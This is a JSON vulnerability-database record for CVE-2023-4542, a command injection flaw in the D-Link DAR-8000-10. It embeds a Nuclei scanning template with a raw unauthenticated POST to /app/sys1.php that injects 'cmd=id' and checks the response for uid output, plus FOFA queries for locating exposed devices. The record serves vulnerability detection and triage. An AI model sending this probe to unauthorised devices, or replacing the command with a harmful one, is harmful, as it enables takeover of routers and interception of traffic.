{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-4542/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-4542/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-4542/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-4542/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-4542/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-4542"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-4542"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-4542.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2023-4542\n\ninfo:\n  name: D-Link DAR-8000-10 - Command Injection\n  author: pussycat0x\n  severity: critical\n  description: |\n    D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.\n  impact: |\n    Unauthenticated attackers can execute arbitrary operating system commands through the id parameter in /app/sys1.php, potentially gaining full control of the D-Link DAR-8000-10 router and intercepting all network traffic.\n  remediation: |\n    Update D-Link DAR-8000-10 firmware to a patched version that properly sanitizes the id parameter in sys1.php and prevents operating system command injection.\n  reference:\n    - https://github.com/20142995/sectool\n    - https://github.com/tanjiti/sec_profile\n    - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md\n    - https://vuldb.com/?ctiid.238047\n    - https://vuldb.com/?id.238047\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-4542\n    cwe-id: CWE-78\n    epss-score: 0.84689\n    epss-percentile: 0.997\n    cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: dlink\n    product: dar-8000-10_firmware\n    fofa-query:\n      - body=\"DAR-8000-10\" && title=\"D-Link\"\n      - body=\"dar-8000-10\" && title=\"d-link\"\n  tags: cve,cve2023,dlink,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /app/sys1.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip, deflate\n        Content-Type: application/x-www-form-urlencoded\n\n        cmd=id\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100d47a1a875e4887e6795667946e7aba2e861539f29bdf33caf1eb36522090f42b02200727dfed2fd46053d57a7e84e7d9bd5fe9f096ca1a9fe9e1b7d141f8cfea3555:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-4542"
}